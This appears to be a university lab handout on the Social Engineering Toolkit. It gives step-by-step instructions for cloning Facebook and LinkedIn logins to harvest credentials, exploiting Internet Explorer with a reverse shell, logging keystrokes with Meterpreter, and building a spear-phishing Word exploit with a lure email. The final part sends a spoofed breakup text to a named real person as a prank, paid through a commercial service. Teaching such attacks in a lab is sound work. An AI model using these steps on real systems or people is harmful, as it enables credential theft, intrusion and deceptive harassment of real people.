安全代写 Cybersecurity Lab 3

Cybersecurity Lab 3

Points: 10

NOTE: The Lab Should be Sent as One Document

Using the Social Engineering Toolkit

Learning Objectives: The objective of the lab is to utilize the social engineering toolkit (SET)

PART 1: Setting Up the Environment – We will be using a vulnerable Windows XP Machine to conduct tests. To setup this virtual machine you will follow the steps from lab 1, when setting up the metasploitable2 machine.

You will use the Damn Vulnerable WXP-SP2 Machine ISO file on my Google Drive.

Once installed start the machine up to make sure it is working. This will look different since you are most likely using Virtual Box:

Start Up Damn Vulnerable WXP-SP2.
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Click on Edit virtual machine Settings
- Note(FYI):

- - This is a Windows XP machine running SP2.

Edit Virtual Machine Settings
- Instructions:

- 1. Click on Network Adapter
  2. Click on the Bridged Radio button
  3. Click on the OK Button
Play Virtual Machine
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Click on Play virtual machine

Logging into Damn Vulnerable WXP-SP2.
- Instructions:
  1. Username: administrator
  2. Password: Use the password you set (in the setup).
Open a Command Prompt
- Instructions:
  1. Start –> All Programs –> Accessories –> Command Prompt
Obtain Damn Vulnerable WXP-SP2’s IP Address
- Instructions:
  1. ipconfig
- Note(FYI):

- 1. In my case, Damn Vulnerable WXP-SP2’s IP Address 192.168.1.116.
  2. This is the IP Address of the Victim Machine that will be attacked by Metasploit.
  3. Record your Damn Vulnerable WXP-SP2’s IP Address.

Leave the Damn Vulnerable WXP-SP2 Machine Running!

PART 2: Cloning a Website to Steal Credentials

Start Social Engineering ToolKit in your Kali Linux Server
Website Attack Vector
- Instructions:
  1. Select 2

Select Credential Harvester Method
- Instructions:
  1. Select 3
Select Site Cloner
- Instructions:
  1. Select 2

Enter URL to Clone
- Instructions:
  1. https://www.facebook.com/login.php
  2. Press <Enter>
Website Cloning
- Instructions:
  1. It might take a few minutes to clone the site.
  2. Just Press <Enter>
  3. Then Continue to the Next Section to text this exploit.
- Note(FYI):
  1. Now you have created a cloned facebook login webpage that is listening on port 80.

SWITCH BACK TO YOUR WINDOWS VULNERABLE MACHINE

Start Up Internet Explorer
- Instructions:
  1. Start –> All Programs –> Internet Explorer

Victim Clicks on Link
- Note(FYI):

- - Replace 192.168.1.108 with Kali Linux’s IP Address
- Instructions:

- 1. Place the Kali Linux IP in the Address Bar.
    - In my case, http://192.168.1.108
  2. Provide a test UserID.
  3. Provide a test Password.
  4. Click Login.

Analyzing Results After Login
- Instructions:
  1. Notice that the Address URL changed to Facebook.
    - This is to give the victim a sense of perhaps a failed login attempt instead of invoking suspicion and alarm.
  2. Notice the Email textbox is populated with the Login you previous supplied to Cloned Webpage.
  3. Continue to the next section to see the victim’s username and password.

Viewing Victim’s Username and Password
- Instructions: (On Kali Linux)
  1. Notice that now you have data showing the victim’s username and password.
    - Let’s say you sent this cloned link to many victim’s and left SET run for a while, you will see a lot of username and password combinations.
  2. To Exit, press the <Ctrl> and “c” key at the same time.

Copy Report Link
- Instructions:
  1. Highlight the XML link and Right Click
  2. Click on Copy
  3. Press <Enter>

Exit Web Attack Menu
- Instructions:
  1. Type 99
  2. Press <Enter>

Exit Web Attack Menu
- Instructions:
  1. Type 99
  2. Press <Enter>
Exit Web Attack Menu
- Instructions:
  1. cat “reports/2014-02-08 05:10:21.784846.xml“
    - Note: In your case, this is the report created in Step 2 or this Section.
  2. Notice the Victim’s Login Credentials
- Notes(FYI):
  1. Make sure you put quotes(“) around your file name.

PART 3. Proof of Lab

- Instructions:

- 1. Clone http://www.linkedin.com
    - (See Section 5)
    - For the Victim Login use the following address
      1. first.last@victim.com
  2. Capture the log you created for the cloned linkedin website.
  3. date
  4. echo “Your Name”
    - e.g., echo “John Gray”

Proof of Lab Instructions:

Take a screenshot.

Paste into a word document to send as one document for the entire group.

PART 4: Create a Malicious Weblink for Keystroke Logging

Start Social Engineering ToolKit
Website Attack Vector
- Instructions:
  1. Select 2

Select Metasploit Browser Exploit Method
- Instructions:
  1. Select 2

Select Web Templates
- Instructions:
  1. Select 1

Set Web Attack
- Instructions:
  1. Select 3

Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
- Instructions:
  1. Select 15

Windows Shell Reverse_TCP
- Instructions:
  1. Select 1

Set Reverse Port
- Instructions:
  1. Set to 5555

Waiting for the server to start
- Instructions:
  1. Copy the weblink that is listed above the Server started line.
  2. Continue to the next section.
- Notes:

- - This is the malicious weblink that will be used by the attacker to to social engineer their way into the victim’s machine.

Start Up Internet Explorer
- Instructions:
  1. Start –> All Programs –> Internet Explorer

Victim Clicks on Link
- Instructions:
  1. Place the Kali Linux IP in the Address Bar.
    - In my case, http://192.168.1.105:8080/
    - In your case, get the IP address from Section 5, Step 9.
- Note(FYI):

- - The Web Browser will just crash.

Start up a Command Prompt
- Instructions:
  1. All Programs –> Accessories –> Command Prompt

Start up a Command Prompt
- Instructions:
  1. netstat -nao | findstr 5555
  2. tasklist | findstr 2976
    - 2976 is the process ID for the Metasploit session running on port 5555.
    - In your case, the process ID will probably be different.
  3. tasklist | findstr notepad
- Proof of Lab Instructions:
  1. date
  2. echo “Your Name”

- 1. 1. Where the string “Your Name” is your actual name.
    2. e.g., echo “John Gray”
  2. Do a PrtScn
  3. Paste into a word document

Entering the Victim’s Machine

Get a MSF Prompt
- Instructions:
  1. Press <Enter>, when you see the notepad.exe line.
Obtain the Victim’s Command Prompt
- Instructions:
  1. sessions
  2. sessions -i 1
  3. execute -f cmd.exe -i -M

Start the keystroke sniffer
- Instructions:
  1. Press the <Ctrl> and “z” key at the same time.
    - This will put session 1 into the background.
  2. y
  3. keyscan_start
  4. Continue to next Section.

Login to Facebook

Start Up Internet Explorer
- Instructions:
  1. Start –> All Programs –> Internet Explorer
Login into Facebook
- Instructions:
  1. Email: Use a fake address
    - first.last@victim.com, where first is your first name and last is your last name.
    - e.g., john.gray@victim.com
  2. Password: Use whatever you want.

Review Sniffed Keystrokes

Exit Web Attack Menu
- Instructions:
  1. keyscan_dump
    - This will produce the Facebook
  2. keyscan_stop
- Proof of Lab Instructions #2:
  1. Do a PrtScan
  2. Paste into same word document that contains proof of lab #1.

PART 5: SPEAR PHISHING

Open the SET

Select option 1 to create a spear-phishing attack

Select a FileFormat Payload

After we select our FileFormat type attack, we will be asked what type of exploit we would like to use. Notice that the default is the PDF with the embedded .exe. In this hack, let’s use the Microsoft Word RTF Fragments attack or MS10_087. This will create a Word document that will overflow a buffer and enable us to put a listener or rootkit on the victim’s machine. Type 4 and press enter.

Now that we have decided what type of file we want to use in our attack, our next step is to decide what type of listener (aka rootkit, aka payload) we want to leave on the victim system. These may look familiar to those of you who have used Metasploit as these are Metasploit payloads. Let’s be ambitious and try to get the Metasploit meterpreter on that victim’s machine. If we are successful, we will completely own that system!
After we type number 5 and press enter, we must choose what port we want to listen on (the default 443). SET then goes about creating our malicious file for us. It names that file template.rtf.
If we want to trick the victim into opening the file, we should name it something that sounds enticing or familiar to the victim. Now this will differ depending upon the victim, but in our scenario we’re trying to spear a manager at a large company, so let’s call it StudyGuide, something he or she might actually be expecting in their email.

Now that we have created the malicious file, we now need to create the email. This is important. If we’re to get the victim to open the file, the email must look legitimate. SET prompts us whether we want to use a pre-defined template or a one-time-use email template. Let’s be creative and choose a one-time-use email.

SET then prompts us for the subject of the email. In this case, I used Sales Report. SET then asks us whether we want to send it in html or plain text. I chose html to make it look more inviting and legitimate. Finally, SET prompts us to write the body of the email and then type Control + C when we are finished. Take a screenshot and submit this portion of the lab as proof of lab.

I wrote:

Dear Students:

Please find attached the Study Guide for the upcoming exam.

Best of Luck!

Dr. Evil

When we’re finished, SET will ask us whether we want to use a Gmail account or send it from our SMTP server. In most cases, we will want to use a Gmail account. Simply type in your address (you might want to create an anonymous email account for this purpose) and password, and SET will send the email you created with the malicious attachment from this Gmail account.

PART 6: SMS Spoofing

Open the SET

We have previously used SET to spear phish in Kali Linux, but the one we want this time is “SMS Spoofing Attack Vector.” To begin this attack, Select #7.

In the following screen we are asked whether we want “Perform a SMS Spoofing Attack” or “Create a Social Engineering Template.” Select #1. Once you have made that selection, you will be queried whether you want to spoof a single number or a mass attack. Select #1 for a single number.

Here, I want to send a spoofed text message from Caitlin (my friend’s girlfriend) to Wenxi (my fellow PHD) where she breaks up with him. This should rattle him a bit and give me a few chuckles as he is madly in love with her. (YOU CAN MODIFY THE MESSAGE).
First, enter his phone number where it asks you “Send sms to.” Then select #2 to craft a One-Time Use SMS. Finally, enter her phone number. Make certain both numbers are preceded by the “+”.
In our final step, we need to type the message we want sent to Wenxi from his girlfriend, Caitlin. “I’m so sorry Wenxi. I have met another man and he is the love of my life. I hope we can remain friends”

Take a screenshot when you are finished typing to send for the lab. Exit this by hitting Control + C.

This will bring you to the final screen. In this screen, we will need to select the intermediary for the spoofed SMS message. You have four options here. The first is free, and as they say, it is buggy (when I ran it, SET crashed). Then, there are two for-pay options and, finally, the Android emulator.

I chose the third option, SMSGANG. They charge 3 euros for 5 messages, or about $0.65 in U.S. dollars per message. When you pay (they accept credit cards and PayPal) they send you a PIN code. After selecting #3, it will ask you for a “pincode.” Enter the one SMSGANG emailed you and then your text message is sent!

Related Posts